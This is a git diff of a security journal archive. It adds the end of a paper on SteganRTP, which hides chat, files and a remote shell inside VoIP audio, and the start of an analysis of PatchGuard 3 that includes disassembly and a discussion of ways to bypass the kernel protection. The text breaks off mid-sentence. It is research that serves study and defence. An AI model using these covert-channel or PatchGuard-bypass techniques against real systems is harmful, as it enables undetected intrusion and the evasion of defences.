System + +The encryption method chosen for use in the SteganRTP reference implementation +is not really encryption at all. In favor of light-weight and speed, a simple +bitwise exclusive-or (XOR)[26] obfuscation method was chosen as a symmetric +cipher. The choice of encryption method here does not indicate that another, +more robust type of encryption could not be used; rather, the modular design +of the reference implementation promotes drop-in replacement of the current +encryption system entirely, assuming that the replacement encryption method +does not have a noticeable impact upon the latency of the overt RTP stream +being used as cover-medium. + +The author does not claim that the obfuscation method used by the SteganRTP +reference implementation to be cryptographically secure. Rather, it is well +documented in the literature that XOR against a repeating keystream is +insecure. The obfuscation of message data is merely meant to provide some +rudimentary protections against statistical steganalysis which focuses upon +perceptible properties of language within the stego-medium. + +The XOR obfuscation method employed by the SteganRTP reference implementation +consists of the following steps: + + 1. Create a bit-pad for use as keying information. + 2. Choose an offset into the bit pad to begin using the keying information. + 3. XOR the message against the bit pad, byte by byte. + +Bit-pad Creation + +The method chosen for creation of the bit-pad is simply to duplicate the +bit-string found in keyhash, the creation of which is described in detail in +Section 3.3.1. + +Choose a Bit-pad Offset + +To help protect against some forms of statistical analysis that have proved +effective against XOR obfuscation using repeated static keying information, it +was decided against beginning every XOR loop at the same position within +keyhash. To avoid this, a new offset into keyhash for each message must be +chosen. The method that the SteganRTP reference implementation employs to +determine this offset is to use the hashword[25] function to create a 32-bit hash +of keyhash and the sum of the RTP packet being embedded into's Seq and +Timestamp header fields. The resultant hash is then interpreted as a 32-bit +integer. The integer modulus 20 is the chosen offset into keyhash. + +The integer which is the result of the offset choosing operation and is within +the range of 0 through 19 is defined here as keyhashoffset and described by +Equation below. + + keyhash_offset = hashword( keyhash, ( RTP_Seq + RTP_TS ) ) mod 20 + +The keyhash_offset equation incorporates keyhash so as to not be entirely +computable from observable information in the RTP packet header. + +XOR Loop + +When used as a bit-pad for the XOR operation loop, keyhash is used 8-bits, or +1-byte, at a time. The XOR loop begins with the first byte of the message to +be obfuscated and the byte located at index keyhash_offset within keyhash. The +two bytes are XORed to produce a result byte. This result byte is placed into +the obfuscated message buffer at the same byte index as the original message +byte. If the end of the bit-pad is reached, the position of the next byte in +the bit-pad returns to the beginning of the bit-pad. When the end of the +original message is reached, the obfuscated message buffer should be of equal +length to the original message and have one corresponding obfuscated byte for +each original byte in the message. + +It is important to note that within the scope of steganography terminology, +whether or not message data is obfuscated or encrypted is irrelevant. As +such, further reference to the obfuscated message will still be referred to as +the message, or message data. + +3.5.4) Embedding System + +The embedding system that was developed for the SteganRTP reference +implementation is a generalized least-significant-bit (LSB) steganographic +data embedding method. It is generalized such that when provided with a +cover-medium buffer, its length, the size of each word value within the +cover-medium buffer, and the message buffer to be embedded, it is then able to +perform the LSB embedding operation. In this way, any audio Codec which uses +a linear grouping of fixed-length audio samples should be able to be utilized +as cover-medium by the embedding system. + +For the purpose of discussion of the SteganRTP embedding system, the term word +value used in this context is equivalent to audio sample. The example used +here, as well as the only Codec currently supported by the reference +implementation, is G.711. G.711 is a Codec which encodes audio as a linear +grouping of 8-bit audio samples. This encoded data is transported by RTP +packets as their payload and will serve as cover-medium. + +Using the generalized LSB embedding method, the LSB of each word value in the +cover-medium is modified to be equivalent to a single bit from the message +data buffer, in order. The properties of the RTP packet, such as its payload +length and payload type header value, determine how much message data can be +embedded into the packet's payload. The RTP packet's payload size is +determined by subtracting the size of the RTP packet's header from the value +of the UDP packet header's Length field. The wordsize is equivalent to the +sample size used by the RTP packet's Codec, indicated by the RTP packet +header's payload type field. Modifying 1 bit from each word value requires 8 +word values to embed a single byte of message data. Thus, the amount of +available space within an RTP packet's payload for embedding is found by +multiplying the word value size by 8, then dividing the RTP packet payload +size by the result. + +The resultant value is defined here as the RTP packet's available_space for +embedding and is described by Equation below. + + available_space = RTP_payload_size / (wordsize * 8 ) + +The space available for user data after prepending the SteganRTP communication +protocol's message header is defined here as the SteganRTP message's +payload_size and is described by Equation below. + + + payload_size = available_space - sizeof( message_header ) + + +Thus, payload_size bytes of user data can be packaged as a SteganRTP message +and embedded into an RTP packet payload cover-medium of availablespace bytes. +If an RTP packet is too small to contain a valid message, it is passed along +unmodified. + +If a message being embedded is smaller than the available space in the +cover-medium, the message is padded out to the available size with random +data. This ensures a more uniform distribution of modified values throughout +the cover-medium. + +3.5.5) Extraction System + +All inbound RTP packets are sent to the extraction system where potential +message data is extracted, decrypted, and then verified. The extraction system +is essentially a reverse of the embedding system described in Section 3.5.4 and +then a pass through the symmetric encryption system described in Section 3.5.3. +This results in an decrypted potential message where the message's Checksum / +ID header field value can be verified to determine whether or not the extracted +potential message is valid. + +If an extracted potential message is found to be valid, it is passed to the +message handler component. + +3.5.6) Outbound Data Polling System + +File descriptors in the outbound file descriptors list are polled, in order, +for data waiting to be sent. When a file descriptor is found to have data, a +new formatted message is created if needed and data is read to fill the +payload of that message from the file descriptor. The message type is +indicated by the file descriptor's record in the outbound file descriptors +list. The result of this operation is a formatted SteganRTP message ready +for encryption and embedding into the cover-medium. + +3.5.7) Message Caching System + +All inbound and outbound SteganRTP messages are cached. The outbound message +cache provides a mechanism for retrieval of any given message in the event +that the remote application issues a Resend control message requesting that +the message be resent. The inbound message cache provides a mechanism for +storage of messages received that are beyond the expected sequence number. +Once the expected message is received, the others may be read back from the +cache rather than requesting that the remote application resend them. + +3.5.8) Shell Service + +The local application's shell service is essentially a child process executing +a shell. This process's standard input and output file descriptors are +replaced with file descriptors which are stored in the inbound and outbound +file descriptors lists, respectively. The local shell service is disabled by +default in the SteganRTP reference implementation and must be enabled via the +command-line. + +3.6) Use + +3.6.1) Command-line + +The SteganRTP application provides a number of command-line arguments allowing +for control and configuration of various components. The following sections +describe each in detail. + +Usage Output Overview + +The following usage output was copied verbatim from the most recent version of +the reference implementation, SteganRTP 0.3b. + +Usage: steganrtp [general options] -t -k + required options: + at least one of: + -a The "source" of the RTP session, or, host +treated as the "close" endpoint (host A) + -b The "destination" of the RTP session, or, +host treated as the "remote" endpoint (host B) + -k Shared secret used as a key to obfuscate +communications + general options: + -c Host A's RTP port + -d Host B's RTP port + -i Interface device (defaults to eth0) + -s Enable the shell service (DANGEROUS) + -v Increase verbosity (repeat for additional +verbosity) + help and documentation: + -V Print version information and exit + -e Show usage examples and exit + -h Print help message and exit + +Command-line Arguments + +The following command-line arguments are available from the SteganRTP +application's command-line. + +-a host + +host is the name or IP address of the closest side of the RTP session desired +to be utilized as cover-medium (Host A). + +-b host + +host is the name or IP address of the remote size of the RTP session desired +to be utilized as cover-medium (Host B). + +-k keyphrase + +keyphrase is a shared secret between the users of the two SteganRTP instances +which will be communicating. In some cases, a single user may be running both +instances. The keyphrase is used to generate a bit-pad via the SHA-1 hash +function which will later be used to obfuscate the data being +steganographically embedded into the RTP audio cover-data. + +-c port + +port is the RTP port used by Host A. + +-d port + +port is the RTP port used by Host B. + +-i interface + +interface is the interface to use on the local host. This parameter defaults +to "eth0". + +-s + +This argument enables the command shell service. If the command shell service +is enabled, the user of the remote instance of SteganRTP will be able to +execute commands on the local system as the user running SteganRTP. You +likely don't want this unless you are the user running both instances of +SteganRTP and intend to use the remote instance as an interface for a remote +shell on that host. This feature can be useful for remote administration of a +system without direct access to the system, assuming that RTP is allowed to +traverse traffic policy enforcement points. + +-v + +This argument increases the verbosity level. Repeat for higher levels of +verbosity. + +-V + +This argument prints SteganRTP's version information and exits. + +-e + +This argument prints a quick examples reference. + +-h + +This argument prints the usage (help) information and exits. + +Usage Examples + +You can print a quick reference of the following examples from the SteganRTP +command-line by using the -e command-line argument. + +The simplest command-line you can execute to successfully run SteganRTP is: + + steganrtp -k -b + +This will begin a session utilizing any RTP session involving host-b as the +destination endpoint. + + steganrtp -k -a -b -i + +This will begin a session utilizing any RTP session between host-a and host-b +using interface interface + + steganrtp -k -a -b -i -s + +This is the same as the previous example but will enable the command shell +service: + + steganrtp -k -a -b -c -d + +This will begin a session utilizing a specific RTP session between host-a on +port a-port and host-b on b-port. Note, this will effectively disable RTP +session auto-identification and will attempt to use an RTP session as +described whether it exists or not. This is useful for when an RTP session +that is desirable for utilization is already in progress as the other examples +rely on libfindrtp to identify the RTP session as it is being set up by VoIP +signaling and thus must be waiting for the call-setup. + +3.6.2) User Interface + +SteganRTP provides a curses user interface featuring four windows; the Command +window at the bottom of the screen, the large Main window in the middle of the +screen, and the Input and Output Status windows at the top of the screen. + +Windows + +Command Window + +All keyboard input, if accepted, is displayed in the Command window. Lines of +input that are not prefixed with a slash ('/') character are treated as chat +text and are sent to the remote instance of SteganRTP as such. Lines of input +that begin with a slash are considered commands and are processed by the local +instance of SteganRTP. + +Main Window + +When in Chat mode, chat text and general SteganRTP information messages and +events are displayed in the Main window. When in shell mode, this window is +overloaded with the input to and output of the shell service provided by the +remote instance of SteganRTP. + +Input Status Window + +Events related to incoming RTP packets or SteganRTP communication messages are +displayed in the Input Status window. + +Output Status Window + +Events related to output RTP packets or SteganRTP communication messages are +displayed in the Output Status window. + +Commands + +The following commands can be executed from within the Command window: + +/chat + +The "chat" command puts the interface into Chat Mode. + +/sendfile filename + +The "sendfile" command queues a file for transmission to the remote instance +of SteganRTP. filename is the path location and filename of the local file to +be sent. + +/shell + +The "shell" command puts the interface into Shell Mode. + +/quit +/exit + +The "quit" and "exit" commands exit the program. + +/help +/? + +The "help" and "?" commands print an available command list. + +4) Solutions to Problems and Challenges + +The following sections describe this research effort's approach to solving +many of the problems and challenges that were identified in Section 2.3, as +implemented via the SteganRTP reference implementation. Most of the solutions +that have been devised during this research effort involved the creation of a +communications protocol to operate within the covert channel established +within the cover-medium. This protocol employs a formatted message header +which is prepended to user message data before being embedded in the +cover-medium, providing various utility to the application making use of the +protocol. + +4.1) Unreliable Transport + +To mitigate the unreliable properties of the underlying transport protocols +used to transmit the cover-medium, the message header contains a sequence +number. This sequence number coupled with the message caching system allows +the recipient to both identify when an expected message is missing as well as +request a resend of a particular message via a control message. This property +also provides the added benefit of detecting erroneously or maliciously +replayed messages. + +When considering potential solutions for this problem, various types of +Forward Error Correction (FEC) were considered. Due to the limited space +available for message data as a result of the size of cover-medium available, +the additional space required for redundant data by most algorithms considered +deemed them to be unfit for purpose within this research effort's context. + +4.2) Cover-Medium Size Limitations + +The same property of RTP which restricts the size of available cover-medium in +each packet is luckily the same property which ensures that there are an +abundance of packets being sent between RTP endpoints every second. User data +can be spread over multiple messages and cover-packets and then reassembled at +their destination. For this research effort's purposes and goals, namely the +timely transfer of user text chat, interactive shell access, and transfer of +small files, an achieved throughput of 1,000 bytes per second as described in +Section 2.2.3 was found to be more than adequate. + +4.3) Latency + +To prevent against unintended impact on RTP packet latency, care was taken to +efficiently perform a number of operations: + +4.3.1) Inbound Packet Processing + +When receiving inbound RTP packets for processing, the receiving system does +not require making any modifications to the received packet. In the SteganRTP +reference implementation, the packet is received and immediately accepted for +continued routing by the packet queue prior to extracting, decrypting, and +verifying any potential message data found within the payload. + +4.3.2) Outbound Packet Processing + +When receiving outbound RTP packets for processing, the fewest number of +operations possible must be performed in order to make a decision on whether +or not the packet should be immediately accepted for continued routing or if +it must be held for modification. In the SteganRTP reference implementation, +the packet is received and then all active outbound file descriptors are +polled for data waiting to be sent. If no data is waiting to be sent, the +packet is then accepted for continued routing by the packet queue. + +4.3.3) Encryption Overhead + +When encrypting the raw message prior to embedding into the cover-medium, a +low-overhead algorithm was used. The SteganRTP reference implementation +employs an XOR against a SHA-1 hash of a user-supplied shared-secret. + +4.4) Tracking of RTP Streams + +Identification and tracking of RTP streams is handled by the libfindrtp C +library paired with the NetFilter libipq C library for tracking and hooking +packets. Both libraries were evaluated during this research effort's initial +requirements phase and were deemed fit for purpose. + +4.5) Media Gateway Audio Modifications + +4.5.1) Audio Codec Conversion + +Due to the nature of VoIP, it is not always possible to detect whether or not +an audio session such as RTP is terminating at the actual recipient of the +call audio or at an intermediary. As such, it is not possible to reliably +transmit stego-medium from end to end unless the actual network addresses of +each endpoint are known. Due to this limitation, the SteganRTP reference +implementation assumes that there are no intermediary devices along the media +path making changes to the RTP payload. The reference implementation makes +this assumption by also assuming that the sending and receiving applications +are either running on the same hosts as the RTP endpoint applications or are +along the network path between the two visible RTP endpoints which may or may +not be intermediaries. The reference implementation requires that these +endpoint network addresses are specified by the user or identified by the RTP +session identification component. + +4.6) Mid-session Audio Codec Change + +The SteganRTP reference implementation's embedding component addresses the +issue of mid-session audio Codec change by determining the audio sample word +size dynamically based on the Codec value supplied by the RTP packet's header. +Thus, the embedding system's parameters are derived from each individual RTP +packet that will be embedded into as cover-medium. If the RTP session were to +change Codecs mid-session, or even to change Codecs for every other packet, +the embedding system will only operate on RTP packets who's payloads are +encoded with a Codec that the embedding system recognizes and has parameters +defined for. If the embedding system does not recognize and support a +particular packet's Codec, that packet is passed unmodified. + +5) Conclusion + +5.1) Design Goals + +It is the author's belief that all of the design goals set forth in Section 3.1 +for the SteganRTP reference implementation were met. The primary goal of +steganography, establishment of a full-duplex communications channel, +compensation for the unreliable transport mechanism, identical user +experience regardless of mode of operation, and multi-type data transfer +were all accomplished. + +5.2) Identified Challenges + +It is the author's belief that all but two of the identified problems and +challenges identified in Section 2.3 were fully addressed. The two challenges +that were not addressed were the various types of media gateway audio +modifications outlined in Section 2.3.6 due to scope and the issue of compressed +audio outlined in Section 2.3.5 due to time limitations of the research effort. + +5.3) Secure Real-time Transfer Protocol + +It is important to note that use of the Secure Real-time Transfer Protocol +(SRTP) RTP profile may prevent specific operational scenarios such as the +active MITM scenario described in Section 3.2.2. Encrypting various parts of the +RTP header and RTP payload will prevent invasive modification of the payload +by an external entity to the RTP session. SRTP, however, won't protect +against steganographic embedding of message data prior to the application of +the SRTP encryption methods, such as may be performed within the RTP endpoint +application itself. + +5.4) Future Research + +It is the author's intention to continue this research effort at a later time. +The identified areas for continued research include: + + 1. Replacement of the generalized LSB embedding system with Codec specific + embedding algorithms. Utilizing Codec-specific properties, more intelligent + embedding methods such as the inclusion of silence and voice detection can + be performed as well as a wider variety of Codecs can be supported. + 2. Creation of embedding algorithms for video Codecs. + 3. Replacement of the XOR obfuscation system with real encryption. + 4. Addition of support for fragmentation of larger formatted messages across + multiple RTP packet payload cover-mediums. + 5. Expansion of the shell service functionality into a more generalized + services framework. + +References + +[1] J. Rosenberg, H. Schulzrinne, G. Camarillo, A. Johnston, J. Peterson, + R. Sparks, M. Handley, and E. Schooler. Sip: Session initiation protocol. + RFC 3261, Internet Society (IETF), June 2002. +[2] Wikipedia. H.323 ¿ wikipedia, the free encyclopedia. http:// + en.wikipedia.org/w/index.php?title=H.323&oldid=146577248, 2007. + [Online; accessed 2-September-2007]. +[3] Wikipedia. Skinny client control protocol ¿ wikipedia, the free + encyclopedia. http://en.wikipedia.org/w/index.php?title=Skinny + Client Control Protocol&oldid=133621770, 2007. [Online; accessed 2- + September-2007]. +[4] H. Schulzrinne, S. Casner, R. Frederick, and V. Jacobson. Rtp: A transport + protocol for real-time applications. RFC 1889, Internet Society (IETF), January + 1996. +[5] J. Postel. User datagram protocol. RFC 768, Internet Society (IETF), August + 1980. +[6] M. Baugher, D. McGrew, M. Naslund, E. Carrara, and K. Norrman. The secure + real-time transport protocol (srtp). RFC 3711, Internet Society (IETF), March + 2004. +[7] Mehdi Kharrazi, Husrev T. Sencar, and Nasir Memon. Image steganography: + Concepts and practice. Lecture Notes Series, Institute for Mathematical Sci- + ences, National University of Singapore, 2004. +[8] Huaiqing Wang and Shuozhong Wang. Cyber warfare: steganography vs. + steganalysis. Commun. ACM, 47(10):76¿82, 2004. +[9] Tayana Morkel, Jan H P Elo¿, and Martin S Olivier. An overview of im- + age steganography. In Proceedings of the Fifth Annual Information Security + South Africa Conference (ISSA2005), Sandton, South Africa, June/July 2005. + Published electronically. +[10] Unknown. S-tools 4.0. ftp://ftp.funet.fi/pub/crypt/mirrors/idea. + sec.dsi.unimi.it/code/s-tools4.zip, August 2006. +[11] Fabien A. P. Petitcolas. mp3stego. http://www.petitcolas.net/fabien/ + steganography/mp3stego/, June 2006. +[12] Heinz Repp. Hide 4 pgp. http://www.rugeley.demon.co.uk/security/ + hide4pgp.zip, December 1996. +[13] I)ruid. An analysis of voip steganography re- + search e¿orts. http://druid.caughq.org/papers/ + An-Analysis-of-VoIP-Steganography-Research-Efforts.pdf, + September 2007. +[14] I)ruid. Real-time steganography with rtp. http://druid.caughq.org/ + presentations/Real-time-Steganography-with-RTP.pdf, August 2007. +[15] Defcon 15. http://www.defcon.org/html/defcon-15/dc-15-schedule. + html, August 2007. +[16] T. Takahashi and W. Lee. An assessment of voip covert channel threats. http: + //voipcc.gtisc.gatech.edu/download/securecomm.pdf, July 2007. +[17] Wikipedia. G.711 ¿ wikipedia, the free encyclopedia. http:// + en.wikipedia.org/w/index.php?title=G.711&oldid=151887535, 2007. + [Online; accessed 6-September-2007]. +[18] Wikipedia. Least signi¿cant bit ¿ wikipedia, the free en- + cyclopedia. http://en.wikipedia.org/w/index.php?title= + Least significant bit&oldid=150766150, 2007. [Online; accessed + 6-September-2007]. +[19] Voip foro - codecs. http://www.voipforo.com/en/codec/codecs.php, + 2007. [Online; accessed 5-September-2007]. +[20] I)ruid. Steganrtp. http://sourceforge.net/projects/steganrtp/, Au- + gust 2007. +[21] D. Eastlake 3rd and P. Jones. Us secure hash algorithm 1 (sha1). RFC 3174, + Internet Society (IETF), September 2001. +[22] I)ruid. lib¿ndrtp. http://sourceforge.net/projects/libfindrtp/, + February 2007. +[23] Net¿lter. http://www.netfilter.org/, 2007. [Online; accessed 6- + September-2007]. +[24] Wikipedia. Type-length-value ¿ wikipedia, the free encyclopedia. http: + //en.wikipedia.org/w/index.php?title=Type-length-value&oldid= + 128880452, 2007. [Online; accessed 3-September-2007]. +[25] Bob Jenkins. Net¿lter. http://www.burtleburtle.net/bob/c/lookup3.c, + May 2006. [Online; accessed 6-September-2007]. +[26] Wikipedia. Exclusive or ¿ wikipedia, the free encyclopedia. http://en. + wikipedia.org/w/index.php?title=Exclusive or&oldid=152332544, + 2007. [Online; accessed 5-September-2007]. diff --git a/uninformed/8.2.txt b/uninformed/8.2.txt new file mode 100644 index 0000000..5017991 --- /dev/null +++ b/uninformed/8.2.txt @@ -0,0 +1,1111 @@ +PatchGuard Reloaded: A Brief Analysis of PatchGuard Version 3 +September, 2007 +Skywing +skywing@valhallalegends.com +http://www.nynaeve.net/ + +Abstract: Since the publication of previous bypass or circumvention techniques +for Kernel Patch Protection (otherwise known as ``PatchGuard''), Microsoft has +continued to refine their patch protection system in an attempt to foil +known bypass mechanisms. With the release of Windows Server 2008 Beta 3, +and later a full-blown distribution of PatchGuard to Windows Vista / +Windows Server 2003 via Windows Update, Microsoft has introduced the next +generation of PatchGuard to the general public (``PatchGuard 3''). As with +previous updates to PatchGuard, version three represents a set of +incremental changes that are designed to address perceived weaknesses and +known bypass vectors in earlier versions. Additionally, PatchGuard 3 +expands the set of kernel variables that are protected from unauthorized +modification, eliminating several mechanisms that might be used to +circumvent PatchGuard while co-existing (as opposed to disabling) it. This +article describes some of the changes that have been made in PatchGuard 3. +This article also proposes several new techniques that can be used to +circumvent PatchGuard's defenses. Countermeasures for these techniques are +also discussed. + +1) Introduction + +PatchGuard is a controversial feature of Windows x64 editions, starting with +Windows Server 2003 x64 / Windows XP x64, and continuing on with Windows Vista +x64 and Windows Server 2008 x64. The design goals behind PatchGuard are to +prevent the kind of rampant hooking and modification of various kernel code +and data structures that has been so common on x86 versions of Windows. +Microsoft has stated that the vast majority of kernel crashes are caused by +third party drivers, and the author's experiences with Windows firmly support +this supposition. Because accessing internal kernel data structures and +hooking kernel functions typically requires intricate synchronization with the +rest of the system in order to be performed in a completely safe fashion, +especially on multiprocessor machines, many third party drivers that perform +these sorts of dangerous tasks have historically made egregious mistakes that +have often lead to system stability or a compromise of system security. The +latter is especially common in cases where third party programs hook +functions, such as system calls, and subsequently fail to perform sufficient +parameter validation. + +Microsoft's solution to this problem is to attempt to forcibly prevent third +party code from making unauthorized modifications to internal kernel data +structures and code through technical means in addition to discouraging +developers from performing such tasks. However, due to the nature of how the +Windows kernel (and its supporting drivers) are designed, it is not feasible +for kernel mode drivers to run at a lower effective privilege level than the +kernel itself. This poses a problem with respect to Microsoft's goal of +blocking unauthorized kernel patches due to the fact that there is no +hardware-enforced separation between the kernel itself and third-party +drivers. As such, said third party drivers have free reign to manipulate +kernel code and data as desired. + +Although emerging technologies such as TPM and hardware-assisted +virtualization (hypervisors) may eventually provide a mechanism to deploy a +hardware-enforced boundary between certain key parts of the kernel and the +third party drivers that interact with it, such an approach is not generally +applicable to most computers sold today, given the current state of the +technology involved (with respect to both hardware and software capabilities). +Lacking a complete, hardware-enforced solution, Microsoft has turned to other +approaches to dissuade third party software from making unauthorized kernel +modifications. Specifically, the resulting kernel patch protection mechanism +("PatchGuard") is instead based on highly obfuscated code that, while running +at the same effective privilege level as both the kernel itself and third +party drivers, is designed to be resilient against detection and/or +modification by third party drivers. This code is responsible for +periodically checking the integrity of key kernel code and data structures and +will bring down the system if such modifications are detected. By virtue of +the fact that attempting to blithely patch the kernel as was once possible on +Windows x86 editions, attempting to perform the same operations will result in +a system crash on x64 versions of Windows. As such, third party drivers are +effectively preventing from making such modifications on a large-scale basis +with respect to code deployed on customer systems. + +However, like all systems that are founded upon the principal of security +through obscurity, PatchGuard has inherent weaknesses. These weaknesses can +be exploited by third party drivers to either disable PatchGuard entirely or +circumvent its checks altogether while peacefully co-existing with PatchGuard. +Microsoft is fully aware of these deficiencies with respect to the fundamental +approach taken by PatchGuard and has resorted to periodically updating +PatchGuard in such a way as to block known public bypass techniques. The net +result is that Microsoft gives the impression of a ``moving target'' to any +ISV that would defy Microsoft's wishes with respect to circumventing +PatchGuard. This helps to show that any code designed to stop or disable +PatchGuard may become invalidated at some point in the future such as when +Microsoft releases a new update for PatchGuard. This has resulted in a small +arms race with code to circumvent PatchGuard being written by third parties, +and Microsoft responding by developing and deploying countermeasures in the +form of an updated version of PatchGuard that is not susceptible to these +bypass techniques. This cycle has continued through several iterations +already; in fact, PatchGuard is now being deployed to the general public in +its third iteration. + +2) Protection Improvements + +PatchGuard 3 implements several incremental improvements designed to protect +PatchGuard from third party code attempting to disable it as compared to +PatchGuard 2. The majority of the alterations to PatchGuard's self-defense +logic appear to be direct responses to previously published, publicly-known +bypass techniques, rather than general improvements meant to make PatchGuard 3 +more resilient to analysis and attack. In this vein, while the alterations to +PatchGuard 3 (over PatchGuard 2) are effective at disabling most +previously-published bypass mechanisms that the author is aware of, it is not +exceedingly difficult to alter many previous attack mechanisms to be effective +against PatchGuard 3. Many of the protection systems that were implemented in +PatchGuard 2 are still present in PatchGuard 3 in some form or another, though +some of them have been altered to resist previously-published attacks. + +This chapter will describe a number of specific improvements that have been +made. + +2.1) Multiple Concurrent PatchGuard Check Contexts + +In previous PatchGuard releases, there existed a single PatchGuard check +context that would periodically be used to verify the integrity of protected +regions. Some bypass techniques relied on the fact that there existed only +one PatchGuard context by virtue of disabling any invasive kernel patching +that would be required to ``catch PatchGuard in the act'' after locating +PatchGuard. PatchGuard 3 improves upon this by creating at least one +PatchGuard context if PatchGuard is enabled, with a probability of a second +context being initialized at system boot time This is randomized based on the +processor time stamp counter, as all other PatchGuard randomization is done. +Both PatchGuard check contexts, which include all of the data used by +PatchGuard to check system integrity (including the self-decrypting check +routine in non-paged pool memory), operate completely independently if two +contexts happen to be used for a particular system boot. + +There are several advantages to randomly creating more than one check context. +First of all, because the second context is not always created, an element of +uncertainty is (theoretically) introduced into the testing and development +process for PatchGuard bypass techniques, as it is possible that at first +glance, an individual that is researching PatchGuard 3 might not notice that +there is a chance to create more than one context. This may result in lost +time during the debugging process, as some bypass techniques are affected by +the number of active contexts. For example, the original bypass technique +described by the author for PatchGuard 2 [1] effectively turned itself off +after the first positive indication that PatchGuard was caught (although in +this particular instance, the PatchGuard-catching hooks could have allowed to +remain in place afterwards). + +A better example of bypass techniques that might be affected by this sort of +scheme are those that rely on searching system pool memory for a sign of +PatchGuard. For example, a theoretical bypass scheme that operates by +pro-actively locating the PatchGuard context in non-paged pool and disabling +it somehow (perhaps by rewriting the self-decrypting code stub to expand into +a no-operation function) might run afoul of this approach randomly during +testing if it were not designed to re-try a pool memory scan after a positive +hit on PatchGuard. It also eliminates the degree of confidence that such +memory scan approaches provide, as previously, if one had a way to locate the +PatchGuard context in non-paged pool memory, one would either know for certain +that PatchGuard had in fact been disabled by getting a single hit (which could +be taken as an indication that it would now be safe to perform actions +blockedg by PatchGuard). With multiple check contexts having a probability to +run, it is no longer possible for a bypass technique to have logic along the +lines of ``if a PatchGuard context has been located and disabled, then it is +safe to continue'', because there may exist a non-constant number of contexts +in the wild. + +2.2) Filtering of Exception Codes Used to Trigger PatchGuard Execution + +Like PatchGuard 2, and PatchGuard 1 before it, the third iteration of +PatchGuard is primarily executed through an unhandled exception in a DPC +routine which, through the use of a series of structured exception handlers, +eventually results in the self-decrypting PatchGuard stub being called in +non-paged pool memory (based off of the DPC arguments). This presented itself +as a liability, as evidenced by the previous article [2] published on +Uninformed on the subject of disabling PatchGuard (release 2). The problem +with using SEH to trigger execution is that there are a number of points in +the SEH dispatching mechanism that can easily be modified by an external +caller in order to gain execution after an exception is raised, but before a +registered exception handler itself might be called. + +Previous techniques exploited this weakness by positioning themselves in after +the access violation exception raised when a PatchGuard-repurposed DPC routine +dereferenced a specially-crafted invalid pointer argument but before the SEH +logic that invokes the PatchGuard check context in response to the access +violation exception. Specifically, the operating system exported routine used +by the Microsoft C/C++ compiler for all compiler-generated SEH frames, +_C_specific_handler, was targeted by bypass attempts described in the +aforementioned articles. As the SEH frame responsible for running PatchGuard +appears to have been written in C for PatchGuard releases 1 and 2, +_C_specific_handler would be called before the user-supplied SEH logic which +would be responsible for executing the PatchGuard integrity check logic +contained within the current PatchGuard context. At this point, a bypass +technique need only abort the execution of the PatchGuard check routine and +cleanly extricate itself from the call stack to a known-good location in order +to disable PatchGuard. + +However, in order for such a bypass mechanism to properly function, one would +need to ensure that the particular exception being examined by +_C_specific_handler is in fact PatchGuard and not a legitimate kernel mode +exception. Applying a PatchGuard-style bypass to the latter case would be +disastrous and almost certainly result in the system crashing or being +corrupted immediately after the fact. Given this, positively identifying an +exception from the exception dispatcher interception point is key to any +bypass technique built upon exception dispatcher redirection. While the +previous two PatchGuard releases made identifying PatchGuard a trivial task. +In both cases, a special form of invalid address, a ``non-canonical address'', +is dereferenced to trigger the access violation that ultimately results in +PatchGuard's check context being executed A non-canonical address is an +address that does not fall within the subset of a 64-bit address space +presented by modern x64 processors. + +The advantage of using a non-canonical address is clear when one examines the +PatchGuard execution environment for a moment. In Windows kernel mode +programming, it is not generally possible to blindly dereference a bogus +kernel mode pointer. This often results in a sequence of events that bring +down the system, depending on where the dereferenced location is. A +non-canonical address is a special (undocumented) exception to this rule, as +the processor reports the exception via a general protection fault and not the +typical page fault mechanism. In this case, the operating system reports the +exception as an access violation related to an access of the highest kernel +address (0xFFFFFFFFFFFFFFFF). This distinct signature can be used to locate +and disable PatchGuard in a relatively safe fashion, as bogus kernel mode +addresses should never make it to SEH dispatching (in kernel mode) unless the +system is about to crash due to a fatal driver or kernel bug (PatchGuard being +a special case). Thus, it was previously possible to positively identify +PatchGuard by looking for an access violation that referenced +0xFFFFFFFFFFFFFFFF. + +PatchGuard 3 improves the situation somewhat by performing some pre-filtering +of the exception data through an exception handler written in assembly (which +thus does not invoke _C_specific_handler) before the _C_specific_handler based logic +that actually invokes the PatchGuard check routine is executed. Specifically, +the pre-filtering exception handler, whose code is given below, alters the +exception code to take on a random value which overlaps with many valid kernel +mode exceptions. For example, some status codes that are applicable to the +file system space are used, such as STATUS_INSUFFICIENT_RESOURCES, +STATUS_DISK_FULL, STATUS_CANT_WAIT. Additionally, the exception address is +altered as well (in some cases even set to be pointing into the middle of an +instruction), and the dereferenced address (the second exception parameter for +access violations) is also set to a randomized value. After these alterations +are made, the assembly-language exception handler passes control on to the +_C_specific_handler based exception handler, which invokes PatchGuard. Annotated +disassembly for one of the assembly-language pre-filter exception handlers is +provided below: + +; +; EXCEPTION_DISPOSITION +; KiCustomAccessHandler8 ( +; /* rcx */ IN PEXCEPTION_RECORD ExceptionRecord, +; /* rdx */ IN ULONG64 EstablisherFrame, +; /* r8 */ IN OUT PCONTEXT ContextRecord, +; /* r9 */ IN OUT struct _DISPATCHER_CONTEXT* DispatcherContext +; ); +KiCustomAccessHandler8 proc near + test [rcx+_EXCEPTION_RECORD.ExceptionFlags], 66h +loc_14009B4C7: + jnz short retpoint + rdtsc +; Randomize ExceptionInformation[ 1 ] +; ( This is the "referenced address" for +; an access violation exception.) +; +; ( Note that rax is not set to any +; specific defined value in this +; context. It depends upon the value +; that RtlpExecututeHandlerForException +; and by extension RtlDispatchException +; last set rax to. ) + mov [rcx+(_EXCEPTION_RECORD.ExceptionInformation+8)], rax + xor [rcx+(_EXCEPTION_RECORD.ExceptionInformation+8)], rdx + shr eax, 5 + and eax, 70h + sub [r8+98h], rax + and edx, 7Fh + or edx, 0C0000000h +; Set ExceptionCode to a random value. The code +; always has 0xC0000000 set, and the lowest byte +; is always masked with 7F. This often results +; in an exception code that appears like a +; legitimate exception code.) + mov [rcx+_EXCEPTION_RECORD.ExceptionCode], edx + lea rax, loc_14009B4C7+1 +; Set ExceptionAddress to a bogus value. In this case, +; it is set to in the middle of an instruction. This +; may interfere with attempts to unwind successfully from + the exception. + mov [rcx+_EXCEPTION_RECORD.ExceptionAddress], rax +; Set Context->Rip to the same +; bogus exception address value. + mov [r8+0F8h], rax + and qword ptr [r8+88h], 0 +retpoint: + mov eax, 1 + retn + +KiCustomAccessHandler8 endp + +As a direct result of scrubbing the exception and context records by the +assembly-language exception routine, it is no longer possible to use the old +mechanism of looking for an access violation referencing 0xFFFFFFFFFFFFFFFF in +order to 